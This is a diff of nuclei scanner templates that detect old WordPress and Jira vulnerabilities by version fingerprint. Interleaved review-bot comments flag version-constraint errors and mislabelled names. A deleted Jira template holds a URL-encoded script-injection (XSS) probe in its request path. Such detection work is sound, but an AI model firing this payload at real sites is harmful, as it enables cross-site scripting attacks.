@@ -1,16 +1,14 @@ id: CVE-2006-6016 info: - name: "WordPress Core < 2.0.5 - User Metadata Information Disclosure" + name: > + WordPress Core < 2.0.5 - User Metadata Information Disclosure author: topscoder severity: medium - description: "wp-admin/user-edit.php in WordPress before 2.0.5 allows remote authenticated users to read the metadata of an arbitrary user via a modified user_id parameter." + description: > + wp-admin/user-edit.php in WordPress before 2.0.5 allows remote authenticated users to read the metadata of an arbitrary user via a modified user_id parameter. reference: - - http://trac.wordpress.org/ticket/3142 - - http://www.gentoo.org/security/en/glsa/glsa-200611-10.xml - - http://bugs.gentoo.org/show_bug.cgi?id=153303 - - https://wordpress.org/news/2006/10/205-ronan/ - - https://core.trac.wordpress.org/attachment/ticket/3142/3142-2.0.5.diff + - https://www.wordfence.com/threat-intel/vulnerabilities/id/91531e13-5344-442c-99d3-8ccfd61b715d?source=api-prod classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N cvss-score: 4.3 diff --git a/nuclei-templates/CVE-2006/CVE-2006-6017.yaml b/nuclei-templates/CVE-2006/CVE-2006-6017.yaml index 4ef756972a..8e6da1c497 100644 --- a/nuclei-templates/CVE-2006/CVE-2006-6017.yaml +++ b/nuclei-templates/CVE-2006/CVE-2006-6017.yaml 
@@ -1,15 +1,14 @@ id: CVE-2006-6017 info: - name: "WordPress Core <= 2.0.4 - Denial of Service" + name: > + WordPress Core <= 2.0.4 - Denial of Service author: topscoder severity: medium - description: "WordPress before 2.0.5 does not properly store a profile containing a string representation of a serialized object, which allows remote authenticated users to cause a denial of service (application crash) via a string that represents a (1) malformed or (2) large serialized object, because the object triggers automatic unserialization for display." + description: > + WordPress before 2.0.5 does not properly store a profile containing a string representation of a serialized object, which allows remote authenticated users to cause a denial of service (application crash) via a string that represents a (1) malformed or (2) large serialized object, because the object triggers automatic unserialization for display. reference: - - http://www.gentoo.org/security/en/glsa/glsa-200611-10.xml - - http://trac.wordpress.org/ticket/2591 - - http://bugs.gentoo.org/show_bug.cgi?id=153303 - - https://wordpress.org/news/2006/10/205-ronan/ + - https://www.wordfence.com/threat-intel/vulnerabilities/id/be4515d8-0d5d-4925-a9a4-64ba9d51fe02?source=api-prod classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H cvss-score: 6.5 diff --git a/nuclei-templates/CVE-2006/CVE-2006-6808.yaml b/nuclei-templates/CVE-2006/CVE-2006-6808.yaml index e8f568c475..6e2fd421a4 100644 --- a/nuclei-templates/CVE-2006/CVE-2006-6808.yaml +++ b/nuclei-templates/CVE-2006/CVE-2006-6808.yaml 
@@ -1,21 +1,14 @@ id: CVE-2006-6808 info: - name: "WordPress Core <= 2.0.5 - Cross-Site Scripting" + name: > + WordPress Core <= 2.0.5 - Cross-Site Scripting author: topscoder severity: medium - description: "Cross-site scripting (XSS) vulnerability in wp-admin/templates.php in WordPress 2.0.5 allows remote attackers to inject arbitrary web script or HTML via the file parameter. NOTE: some sources have reported this as a vulnerability in the get_file_description function in wp-admin/admin-functions.php." + description: > + Cross-site scripting (XSS) vulnerability in wp-admin/templates.php in WordPress 2.0.5 allows remote attackers to inject arbitrary web script or HTML via the file parameter. NOTE: some sources have reported this as a vulnerability in the get_file_description function in wp-admin/admin-functions.php. reference: - - http://www.vupen.com/english/advisories/2006/5191 - - http://secunia.com/advisories/23587 - - http://secunia.com/advisories/23741 - - http://trac.wordpress.org/changeset/4665 - - http://security.gentoo.org/glsa/glsa-200701-10.xml - - http://www.securityfocus.com/bid/21782 - - http://marc.info/?l=full-disclosure&m=116722128631087&w=2 - - https://exchange.xforce.ibmcloud.com/vulnerabilities/31133 - - http://michaeldaw.org/ - - https://wordpress.org/news/2007/01/wordpress-206/ + - https://www.wordfence.com/threat-intel/vulnerabilities/id/4deae680-4829-4e24-b67b-4066ec9ce4da?source=api-prod classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N cvss-score: 6.4 diff --git a/nuclei-templates/CVE-2007/CVE-2007-0106.yaml b/nuclei-templates/CVE-2007/CVE-2007-0106.yaml index 02ae57ba3c..d00e2d7ff6 100644 --- a/nuclei-templates/CVE-2007/CVE-2007-0106.yaml +++ b/nuclei-templates/CVE-2007/CVE-2007-0106.yaml 
@@ -1,20 +1,14 @@ id: CVE-2007-0106 info: - name: "WordPress Core <= 2.0.5 - Cross-Site Request Forgery to Cross-Site Scripting" + name: > + WordPress Core <= 2.0.5 - Cross-Site Request Forgery to Cross-Site Scripting author: topscoder severity: high - description: "Cross-site scripting (XSS) vulnerability in the CSRF protection scheme in WordPress before 2.0.6 allows remote attackers to inject arbitrary web script or HTML via a CSRF attack with an invalid token and quote characters or HTML tags in URL variable names, which are not properly handled when WordPress generates a new link to verify the request." + description: > + Cross-site scripting (XSS) vulnerability in the CSRF protection scheme in WordPress before 2.0.6 allows remote attackers to inject arbitrary web script or HTML via a CSRF attack with an invalid token and quote characters or HTML tags in URL variable names, which are not properly handled when WordPress generates a new link to verify the request. reference: - - http://securityreason.com/securityalert/2114 - - http://www.securityfocus.com/archive/1/456048/100/0/threaded - - http://wordpress.org/development/2007/01/wordpress-206/ - - http://secunia.com/advisories/23595 - - http://osvdb.org/33397 - - http://www.vupen.com/english/advisories/2007/0061 - - http://www.securityfocus.com/bid/21893 - - http://www.hardened-php.net/advisory_012007.140.html - - https://wordpress.org/news/2007/01/wordpress-206/ + - https://www.wordfence.com/threat-intel/vulnerabilities/id/37f7f9ef-d57a-41e9-bd2c-2aa04a82b6c4?source=api-prod classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H cvss-score: 8.8 diff --git a/nuclei-templates/CVE-2007/CVE-2007-0107.yaml b/nuclei-templates/CVE-2007/CVE-2007-0107.yaml index cf83638e73..830963184e 100644 --- a/nuclei-templates/CVE-2007/CVE-2007-0107.yaml +++ b/nuclei-templates/CVE-2007/CVE-2007-0107.yaml 
@@ -1,24 +1,14 @@ id: CVE-2007-0107 info: - name: "WordPress Core <= 2.0.5 - SQL Injection" + name: > + WordPress Core <= 2.0.5 - SQL Injection author: topscoder severity: critical - description: "WordPress before 2.0.6, when mbstring is enabled for PHP, decodes alternate character sets after escaping the SQL query, which allows remote attackers to bypass SQL injection protection schemes and execute arbitrary SQL commands via multibyte charsets, as demonstrated using UTF-7." + description: > + WordPress before 2.0.6, when mbstring is enabled for PHP, decodes alternate character sets after escaping the SQL query, which allows remote attackers to bypass SQL injection protection schemes and execute arbitrary SQL commands via multibyte charsets, as demonstrated using UTF-7. reference: - - https://exchange.xforce.ibmcloud.com/vulnerabilities/31297 - - http://www.securityfocus.com/bid/21907 - - http://secunia.com/advisories/23741 - - http://www.openpkg.com/security/advisories/OpenPKG-SA-2007.005.html - - http://security.gentoo.org/glsa/glsa-200701-10.xml - - http://osvdb.org/31579 - - http://wordpress.org/development/2007/01/wordpress-206/ - - http://secunia.com/advisories/23595 - - http://www.securityfocus.com/archive/1/456049/100/0/threaded - - http://www.vupen.com/english/advisories/2007/0061 - - http://www.hardened-php.net/advisory_022007.141.html - - http://securityreason.com/securityalert/2112 - - https://wordpress.org/news/2007/01/wordpress-206/ + - https://www.wordfence.com/threat-intel/vulnerabilities/id/f4393526-6357-40ee-a024-f461d0430a62?source=api-prod classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 diff --git a/nuclei-templates/CVE-2007/CVE-2007-0109.yaml b/nuclei-templates/CVE-2007/CVE-2007-0109.yaml index 1011316ab3..96e637ad11 100644 --- a/nuclei-templates/CVE-2007/CVE-2007-0109.yaml +++ b/nuclei-templates/CVE-2007/CVE-2007-0109.yaml 
@@ -1,20 +1,14 @@ id: CVE-2007-0109 info: - name: "WordPress < 2.0.6 - Username Enumeration via Error Messages" + name: > + WordPress < 2.0.6 - Username Enumeration via Error Messages author: topscoder severity: medium - description: "wp-login.php in WordPress 2.0.5 and earlier displays different error messages if a user exists or not, which allows remote attackers to obtain sensitive information and facilitates brute force attacks." + description: > + wp-login.php in WordPress 2.0.5 and earlier displays different error messages if a user exists or not, which allows remote attackers to obtain sensitive information and facilitates brute force attacks. reference: - - http://osvdb.org/31577 - - http://secunia.com/advisories/23621 - - https://exchange.xforce.ibmcloud.com/vulnerabilities/31262 - - http://secunia.com/advisories/23741 - - http://security.gentoo.org/glsa/glsa-200701-10.xml - - http://www.vupen.com/english/advisories/2007/0062 - - http://www.securityfocus.com/archive/1/455927/100/0/threaded - - http://securityreason.com/securityalert/2113 - - https://wordpress.org/news/2007/01/wordpress-206/ + - https://www.wordfence.com/threat-intel/vulnerabilities/id/1f2845a5-7572-4533-8949-08bee99fca20?source=api-prod classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 diff --git a/nuclei-templates/CVE-2007/CVE-2007-0233.yaml b/nuclei-templates/CVE-2007/CVE-2007-0233.yaml index 25112da0d8..96481eeebe 100644 --- a/nuclei-templates/CVE-2007/CVE-2007-0233.yaml +++ b/nuclei-templates/CVE-2007/CVE-2007-0233.yaml 
@@ -1,16 +1,14 @@ id: CVE-2007-0233 info: - name: "WordPress Core < 2.0.7 - SQL Injection" + name: > + WordPress Core < 2.0.7 - SQL Injection author: topscoder severity: high - description: "wp-trackback.php in WordPress 2.0.6 and earlier does not properly unset variables when the input data includes a numeric parameter with a value matching an alphanumeric parameter's hash value, which allows remote attackers to execute arbitrary SQL commands via the tb_id parameter. NOTE: it could be argued that this vulnerability is due to a bug in the unset PHP command (CVE-2006-3017) and the proper fix should be in PHP; if so, then this should not be treated as a vulnerability in WordPress." + description: > + wp-trackback.php in WordPress 2.0.6 and earlier does not properly unset variables when the input data includes a numeric parameter with a value matching an alphanumeric parameter's hash value, which allows remote attackers to execute arbitrary SQL commands via the tb_id parameter. NOTE: it could be argued that this vulnerability is due to a bug in the unset PHP command (CVE-2006-3017) and the proper fix should be in PHP; if so, then this should not be treated as a vulnerability in WordPress. reference: - - https://www.exploit-db.com/exploits/3109 - - http://www.securityfocus.com/bid/21983 - - https://exchange.xforce.ibmcloud.com/vulnerabilities/31385 - - http://osvdb.org/36860 - - https://wordpress.org/news/2007/01/wordpress-207/ + - https://www.wordfence.com/threat-intel/vulnerabilities/id/c3b42bd3-f7d3-43d1-bdd8-4389fd82e1e9?source=api-prod classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 diff --git a/nuclei-templates/CVE-2007/CVE-2007-0262.yaml b/nuclei-templates/CVE-2007/CVE-2007-0262.yaml index fc85da9fee..8eede2e329 100644 --- a/nuclei-templates/CVE-2007/CVE-2007-0262.yaml +++ b/nuclei-templates/CVE-2007/CVE-2007-0262.yaml 
@@ -1,14 +1,14 @@ id: CVE-2007-0262 info: - name: "WordPress Core < 2.0.7 - Full Path Disclosure" + name: > + WordPress Core < 2.0.7 - Full Path Disclosure author: topscoder severity: medium - description: "WordPress 2.0.6, and 2.1Alpha 3 (SVN:4662), does not properly verify that the m parameter value has the string data type, which allows remote attackers to obtain sensitive information via an invalid m[] parameter, as demonstrated by obtaining the path, and obtaining certain SQL information such as the table prefix." + description: > + WordPress 2.0.6, and 2.1Alpha 3 (SVN:4662), does not properly verify that the m parameter value has the string data type, which allows remote attackers to obtain sensitive information via an invalid m[] parameter, as demonstrated by obtaining the path, and obtaining certain SQL information such as the table prefix. reference: - - http://osvdb.org/33458 - - http://www.securityfocus.com/archive/1/456731/100/0/threaded - - https://wordpress.org/news/2007/01/wordpress-207/ + - https://www.wordfence.com/threat-intel/vulnerabilities/id/b1446daf-662d-479c-8fc5-80b27b04d6c4?source=api-prod classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 diff --git a/nuclei-templates/CVE-2007/CVE-2007-0539.yaml b/nuclei-templates/CVE-2007/CVE-2007-0539.yaml index d2d6dfda79..9c695df7d7 100644 --- a/nuclei-templates/CVE-2007/CVE-2007-0539.yaml +++ b/nuclei-templates/CVE-2007/CVE-2007-0539.yaml 
@@ -1,15 +1,14 @@
id: CVE-2007-0539
info:
- name: "WordPress Core < 2.1 - Denial of Service"
+ name: >
+ WordPress Core < 2.1 - Denial of Service
author: topscoder
severity: medium
- description: "The wp_remote_fopen function in WordPress before 2.1 allows remote attackers to cause a denial of service (bandwidth or thread consumption) via pingback service calls with a source URI that corresponds to a large file, which triggers a long download session without a timeout constraint."
+ description: >
+ The wp_remote_fopen function in WordPress before 2.1 allows remote attackers to cause a denial of service (bandwidth or thread consumption) via pingback service calls with a source URI that corresponds to a large file, which triggers a long download session without a timeout constraint.
reference:
- - http://www.securityfocus.com/archive/1/458003/100/0/threaded
- - http://www.securityfocus.com/archive/1/457996/100/0/threaded
- - http://securityreason.com/securityalert/2191
- - https://wordpress.org/news/2007/01/ella-21/
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/94332eb8-0961-4c8d-97bb-3d5d08e8119f?source=api-prod
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L
cvss-score: 4.3
@@ -33,9 +32,9 @@ http:
matchers:
- type: dsl
dsl:
- - compare_versions(version_by_generator, '< 2.1')
- - compare_versions(version_by_js, '< 2.1')
- - compare_versions(version_by_css, '< 2.1')
+ - compare_versions(version_by_generator, '<= 2.1')
+ - compare_versions(version_by_js, '<= 2.1')
+ - compare_versions(version_by_css, '<= 2.1')
- type: status
status:
diff --git a/nuclei-templates/CVE-2007/CVE-2007-0541.yaml b/nuclei-templates/CVE-2007/CVE-2007-0541.yaml
index 52223d4703..92c7ff9f54 100644
--- a/nuclei-templates/CVE-2007/CVE-2007-0541.yaml
+++ b/nuclei-templates/CVE-2007/CVE-2007-0541.yaml
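Review bot: The three DSL lines now match 2.1 itself (`'<= 2.1'`) even though the description says wp_remote_fopen is affected in WordPress before 2.1 and the template name still reads `< 2.1`, so a site on the fixed release is reported as vulnerable. Revert the constraint to `compare_versions(version_by_generator, '< 2.1')` and the same for `version_by_js` and `version_by_css`. The requests and extractors that populate those three variables are above this hunk and are not visible here.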
@@ -1,15 +1,14 @@
id: CVE-2007-0541
info:
- name: "WordPress Core < 2.1 - Directory Traversal"
+ name: >
+ WordPress Core < 2.1 - Directory Traversal
author: topscoder
severity: medium
- description: "WordPress allows remote attackers to determine the existence of arbitrary files, and possibly read portions of certain files, via pingback service calls with a source URI that corresponds to a local pathname, which triggers different fault codes for existing and non-existing files, and in certain configurations causes a brief file excerpt to be published as a blog comment."
+ description: >
+ WordPress allows remote attackers to determine the existence of arbitrary files, and possibly read portions of certain files, via pingback service calls with a source URI that corresponds to a local pathname, which triggers different fault codes for existing and non-existing files, and in certain configurations causes a brief file excerpt to be published as a blog comment.
reference:
- - http://www.securityfocus.com/archive/1/458003/100/0/threaded
- - http://www.securityfocus.com/archive/1/457996/100/0/threaded
- - http://securityreason.com/securityalert/2191
- - https://wordpress.org/news/2007/01/ella-21/
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/c84e274e-292f-4d0f-b847-4a786b4cb15a?source=api-prod
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
cvss-score: 6.5
@@ -33,9 +32,9 @@ http:
matchers:
- type: dsl
dsl:
- - compare_versions(version_by_generator, '< 2.1')
- - compare_versions(version_by_js, '< 2.1')
- - compare_versions(version_by_css, '< 2.1')
+ - compare_versions(version_by_generator, '<= 2.1')
+ - compare_versions(version_by_js, '<= 2.1')
+ - compare_versions(version_by_css, '<= 2.1')
- type: status
status:
diff --git a/nuclei-templates/CVE-2007/CVE-2007-0885.yaml b/nuclei-templates/CVE-2007/CVE-2007-0885.yaml
deleted file mode 100644
index 275c87fe70..0000000000
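Review bot: Widening the DSL constraints to `'<= 2.1'` makes the template flag 2.1 as vulnerable, but the name still says `< 2.1` and the reference dropped in the first hunk is the 2.1 release post, which indicates 2.1 is the fixed version for the pingback file-existence leak. The description itself carries no version, so nothing in this file supports including 2.1. Restore `compare_versions(version_by_generator, '< 2.1')` (and the js/css variants) or, if 2.1 is really affected, update the name and cite the source.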
--- a/nuclei-templates/CVE-2007/CVE-2007-0885.yaml +++ /dev/null @@ -1,34 +0,0 @@ -id: CVE-2007-0885 - -info: - name: Rainbow.Zen Jira XSS - author: geeknik - severity: medium - description: Cross-site scripting (XSS) vulnerability in jira/secure/BrowseProject.jspa in Rainbow with the Zen (Rainbow.Zen) extension allows remote attackers to inject arbitrary web script or HTML via the id parameter. - reference: - - http://web.archive.org/web/20201208220614/https://www.securityfocus.com/archive/1/459590/100/0/threaded - - https://web.archive.org/web/20210119080228/http://www.securityfocus.com/bid/22503 - - https://exchange.xforce.ibmcloud.com/vulnerabilities/32418 - classification: - cve-id: CVE-2007-0885 - tags: cve,cve2007,jira,xss - -requests: - - method: GET - path: - - '{{BaseURL}}/jira/secure/BrowseProject.jspa?id=%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3e' - - matchers-condition: and - matchers: - - type: word - words: - - '">' - - - type: status - status: - - 200 - - - type: word - part: header - words: - - "text/html" diff --git a/nuclei-templates/CVE-2007/CVE-2007-1049.yaml b/nuclei-templates/CVE-2007/CVE-2007-1049.yaml index fbe2ffe3b6..c3d2e4cd3f 100644 --- a/nuclei-templates/CVE-2007/CVE-2007-1049.yaml +++ b/nuclei-templates/CVE-2007/CVE-2007-1049.yaml 
@@ -1,22 +1,14 @@ id: CVE-2007-1049 info: - name: "WordPress Core < 2.09 - Cross-Site Scripting" + name: > + WordPress Core < 2.09 - Cross-Site Scripting author: topscoder severity: high - description: "Cross-site scripting (XSS) vulnerability in the wp_explain_nonce function in the nonce AYS functionality (wp-includes/functions.php) for WordPress 2.0 before 2.0.9 and 2.1 before 2.1.1 allows remote attackers to inject arbitrary web script or HTML via the file parameter to wp-admin/templates.php, and possibly other vectors involving the action variable." + description: > + Cross-site scripting (XSS) vulnerability in the wp_explain_nonce function in the nonce AYS functionality (wp-includes/functions.php) for WordPress 2.0 before 2.0.9 and 2.1 before 2.1.1 allows remote attackers to inject arbitrary web script or HTML via the file parameter to wp-admin/templates.php, and possibly other vectors involving the action variable. reference: - - http://trac.wordpress.org/changeset/4876 - - http://secunia.com/advisories/24306 - - http://trac.wordpress.org/changeset/4877 - - http://www.vupen.com/english/advisories/2007/0741 - - http://osvdb.org/33766 - - http://www.securityfocus.com/bid/22534 - - http://downloads.securityfocus.com/vulnerabilities/exploits/22534.html - - http://secunia.com/advisories/24566 - - http://www.gentoo.org/security/en/glsa/glsa-200703-23.xml - - http://trac.wordpress.org/ticket/3781 - - https://wordpress.org/news/2007/02/new-releases/ + - https://www.wordfence.com/threat-intel/vulnerabilities/id/b16d675f-1b62-4e3e-b91b-7bdb1e70a221?source=api-prod classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N cvss-score: 7.2 
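Review bot: The new folded `name` still carries the version typo `< 2.09`, which reads as 2.9 rather than 2.0.9, and it hides that the description names two affected branches: 2.0 before 2.0.9 and 2.1 before 2.1.1. A name such as `WordPress Core < 2.0.9, 2.1 < 2.1.1 - Cross-Site Scripting` would match the description. The dropped references included the two trac changesets (4876, 4877) that fixed wp_explain_nonce; keeping one of them next to the Wordfence link preserves the fix provenance.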
@@ -40,9 +32,9 @@ http: matchers: - type: dsl dsl: - - compare_versions(version_by_generator, '>= 2.1', '<= 2.1') - - compare_versions(version_by_js, '>= 2.1', '<= 2.1') - - compare_versions(version_by_css, '>= 2.1', '<= 2.1') + - compare_versions(version_by_generator, '2.1') + - compare_versions(version_by_js, '2.1') + - compare_versions(version_by_css, '2.1') - type: status status: diff --git a/nuclei-templates/CVE-2007/CVE-2007-1230.yaml b/nuclei-templates/CVE-2007/CVE-2007-1230.yaml index 12521e3aa8..cee26a1c16 100644 --- a/nuclei-templates/CVE-2007/CVE-2007-1230.yaml +++ b/nuclei-templates/CVE-2007/CVE-2007-1230.yaml @@ -1,18 +1,14 @@ id: CVE-2007-1230 info: - name: "WordPress Core <= 2.1.1 - Cross-Site Scripting" + name: > + WordPress Core <= 2.1.1 - Cross-Site Scripting author: topscoder severity: medium - description: "Multiple cross-site scripting (XSS) vulnerabilities in wp-includes/functions.php in WordPress before 2.1.2-alpha allow remote attackers to inject arbitrary web script or HTML via (1) the Referer HTTP header or (2) the URI, a different vulnerability than CVE-2007-1049." + description: > + Multiple cross-site scripting (XSS) vulnerabilities in wp-includes/functions.php in WordPress before 2.1.2-alpha allow remote attackers to inject arbitrary web script or HTML via (1) the Referer HTTP header or (2) the URI, a different vulnerability than CVE-2007-1049. reference: - - http://trac.wordpress.org/changeset/4952 - - http://www.vupen.com/english/advisories/2007/0756 - - http://secunia.com/advisories/24566 - - http://trac.wordpress.org/changeset/4951 - - http://www.gentoo.org/security/en/glsa/glsa-200703-23.xml - - http://osvdb.org/34361 - - https://wordpress.org/news/2007/03/upgrade-212/ + - https://www.wordfence.com/threat-intel/vulnerabilities/id/a9162c2e-e765-4bda-b09f-982603b5797a?source=api-prod classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N cvss-score: 6.4 
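Review bot: The rewritten matcher only fires on an exact `'2.1'`, so every 2.0.x release up to 2.0.8 that the description lists as affected is now a false negative; the old `'>= 2.1', '<= 2.1'` had the same gap, but this change was the chance to close it. The bare `'2.1'` form also relies on the version library treating an operator-less constraint as equality, which I believe nuclei's compare_versions does, but an explicit operator is clearer. Both branches can be covered with one expression per branch and per version source, provided the matcher keeps its default `or` condition across DSL entries.
```yaml
      - type: dsl
        dsl:
          - compare_versions(version_by_generator, '< 2.0.9')
          - compare_versions(version_by_generator, '>= 2.1', '< 2.1.1')
          - compare_versions(version_by_js, '< 2.0.9')
          - compare_versions(version_by_js, '>= 2.1', '< 2.1.1')
          - compare_versions(version_by_css, '< 2.0.9')
          - compare_versions(version_by_css, '>= 2.1', '< 2.1.1')
      # … unchanged: status matcher …
```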
diff --git a/nuclei-templates/CVE-2007/CVE-2007-1244.yaml b/nuclei-templates/CVE-2007/CVE-2007-1244.yaml index 6ba238545f..976ec76102 100644 --- a/nuclei-templates/CVE-2007/CVE-2007-1244.yaml +++ b/nuclei-templates/CVE-2007/CVE-2007-1244.yaml @@ -1,20 +1,14 @@ id: CVE-2007-1244 info: - name: "WordPress Core <= 2.1.1 - Cross-Site Scripting" + name: > + WordPress Core <= 2.1.1 - Cross-Site Scripting author: topscoder severity: medium - description: "Cross-site request forgery (CSRF) vulnerability in the AdminPanel in WordPress 2.1.1 and earlier allows remote attackers to perform privileged actions as administrators, as demonstrated using the delete action in wp-admin/post.php. NOTE: this issue can be leveraged to perform cross-site scripting (XSS) attacks and steal cookies via the post parameter." + description: > + Cross-site request forgery (CSRF) vulnerability in the AdminPanel in WordPress 2.1.1 and earlier allows remote attackers to perform privileged actions as administrators, as demonstrated using the delete action in wp-admin/post.php. NOTE: this issue can be leveraged to perform cross-site scripting (XSS) attacks and steal cookies via the post parameter. reference: - - https://exchange.xforce.ibmcloud.com/vulnerabilities/32703 - - http://archives.neohapsis.com/archives/fulldisclosure/2007-02/0583.html - - http://www.securityfocus.com/archive/1/461351/100/0/threaded - - http://www.securityfocus.com/bid/22735 - - http://secunia.com/advisories/24566 - - http://osvdb.org/33787 - - http://www.gentoo.org/security/en/glsa/glsa-200703-23.xml - - http://osvdb.org/33788 - - https://wordpress.org/news/2007/03/upgrade-212/ + - https://www.wordfence.com/threat-intel/vulnerabilities/id/c6670e56-ae81-4b1b-8274-bf355a411e92?source=api-prod classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N cvss-score: 6.4 diff --git a/nuclei-templates/CVE-2007/CVE-2007-1277.yaml b/nuclei-templates/CVE-2007/CVE-2007-1277.yaml index 0afef2c7b5..0e26e4477d 100644 
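Review bot: The new `name` still labels this template "Cross-Site Scripting", while the description (and the CVE text it quotes) describe a cross-site request forgery in the admin panel, with XSS only as a secondary consequence via the post parameter; anyone filtering findings by class will mis-file it. Change the name to `WordPress Core <= 2.1.1 - Cross-Site Request Forgery` and mention the XSS escalation in the description only. The CVSS vector on the unchanged line below (PR:L, UI:N) also does not describe a CSRF, which requires user interaction, but that predates this commit.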
--- a/nuclei-templates/CVE-2007/CVE-2007-1277.yaml +++ b/nuclei-templates/CVE-2007/CVE-2007-1277.yaml @@ -1,21 +1,14 @@ id: CVE-2007-1277 info: - name: "WordPress Core 2.2.1 - Backdoor" + name: > + WordPress Core 2.2.1 - Backdoor author: topscoder severity: critical - description: "WordPress 2.1.1, as downloaded from some official distribution sites during February and March 2007, contains an externally introduced backdoor that allows remote attackers to execute arbitrary commands via (1) an eval injection vulnerability in the ix parameter to wp-includes/feed.php, and (2) an untrusted passthru call in the iz parameter to wp-includes/theme.php." + description: > + WordPress 2.1.1, as downloaded from some official distribution sites during February and March 2007, contains an externally introduced backdoor that allows remote attackers to execute arbitrary commands via (1) an eval injection vulnerability in the ix parameter to wp-includes/feed.php, and (2) an untrusted passthru call in the iz parameter to wp-includes/theme.php. reference: - - http://www.securityfocus.com/archive/1/461794/100/0/threaded - - http://www.kb.cert.org/vuls/id/214480 - - https://exchange.xforce.ibmcloud.com/vulnerabilities/32807 - - https://exchange.xforce.ibmcloud.com/vulnerabilities/32804 - - http://www.securityfocus.com/bid/22797 - - http://www.vupen.com/english/advisories/2007/0812 - - http://wordpress.org/development/2007/03/upgrade-212/ - - http://www.kb.cert.org/vuls/id/641456 - - http://ifsec.blogspot.com/2007/03/wordpress-code-compromised-to-enable.html - - http://secunia.com/advisories/24374 + - https://www.wordfence.com/threat-intel/vulnerabilities/id/e5539ad8-4203-4d22-9a40-0ed6e0471e19?source=api-prod classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 
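Review bot: The folded `name` keeps the version `2.2.1`, but the description says the backdoored archives were WordPress 2.1.1 downloaded in February and March 2007, so the name contradicts the finding it labels; it should read `WordPress Core 2.1.1 - Backdoor`. This hunk also drops the two CERT notes (VU#214480, VU#641456) that are the primary sources for the compromised-download incident, leaving only the Wordfence entry; keep at least one of them. The matcher for this template is in the next hunk.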
@@ -39,9 +32,9 @@ http: matchers: - type: dsl dsl: - - compare_versions(version_by_generator, '>= 2.2.1', '<= 2.2.1') - - compare_versions(version_by_js, '>= 2.2.1', '<= 2.2.1') - - compare_versions(version_by_css, '>= 2.2.1', '<= 2.2.1') + - compare_versions(version_by_generator, '2.2.1') + - compare_versions(version_by_js, '2.2.1') + - compare_versions(version_by_css, '2.2.1') - type: status status: diff --git a/nuclei-templates/CVE-2007/CVE-2007-1599.yaml b/nuclei-templates/CVE-2007/CVE-2007-1599.yaml index ac43c540f7..7c59f48a17 100644 --- a/nuclei-templates/CVE-2007/CVE-2007-1599.yaml +++ b/nuclei-templates/CVE-2007/CVE-2007-1599.yaml @@ -1,16 +1,14 @@ id: CVE-2007-1599 info: - name: "WordPress Core < 2.0.10 - Open Redirect" + name: > + WordPress Core < 2.0.10 - Open Redirect author: topscoder severity: medium - description: "wp-login.php in WordPress allows remote attackers to redirect authenticated users to other websites and potentially obtain sensitive information via the redirect_to parameter." + description: > + wp-login.php in WordPress allows remote attackers to redirect authenticated users to other websites and potentially obtain sensitive information via the redirect_to parameter. reference: - - http://www.metaeye.org/advisories/40 - - http://secunia.com/advisories/30960 - - http://www.securityfocus.com/archive/1/463291/100/0/threaded - - http://www.debian.org/security/2008/dsa-1601 - - https://wordpress.org/news/2007/04/wordpress-213-and-2010/ + - https://www.wordfence.com/threat-intel/vulnerabilities/id/9f7469ec-cbd5-4f13-8455-b907f2542836?source=api-prod classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 
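Review bot: The exact-version constraint was changed to `'2.2.1'`, but the description says the trojaned archives were 2.1.1, so the template now flags a release nobody reported as backdoored and misses the one that was; the three lines should use `'2.1.1'`. Even then a version fingerprint cannot distinguish a clean 2.1.1 from a backdoored copy, so a hit is at best "possibly backdoored"; the description names the `ix` parameter to wp-includes/feed.php and the `iz` parameter to wp-includes/theme.php as the injected entry points, and a probe of those files would be the actual signal, which I would add as a separate request rather than rely on version alone. The requests that populate the version variables are above the hunk.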
@@ -34,9 +32,9 @@ http:
matchers:
- type: dsl
dsl:
- - compare_versions(version_by_generator, '< 2.0.10')
- - compare_versions(version_by_js, '< 2.0.10')
- - compare_versions(version_by_css, '< 2.0.10')
+ - compare_versions(version_by_generator, '<= 2.0.10')
+ - compare_versions(version_by_js, '<= 2.0.10')
+ - compare_versions(version_by_css, '<= 2.0.10')
- type: status
status:
diff --git a/nuclei-templates/CVE-2007/CVE-2007-1622.yaml b/nuclei-templates/CVE-2007/CVE-2007-1622.yaml
index 9632628df2..787a769493 100644
--- a/nuclei-templates/CVE-2007/CVE-2007-1622.yaml
+++ b/nuclei-templates/CVE-2007/CVE-2007-1622.yaml
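Review bot: The constraint is loosened to `'<= 2.0.10'` while the template name in the previous hunk still says `< 2.0.10` and the reference removed there is the 2.1.3 / 2.0.10 release post, i.e. 2.0.10 is the fix for the redirect_to open redirect, so the fixed release is now reported as vulnerable. Revert to `compare_versions(version_by_generator, '< 2.0.10')` and the matching js/css lines, or change the name and cite a source if 2.0.10 is really affected.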
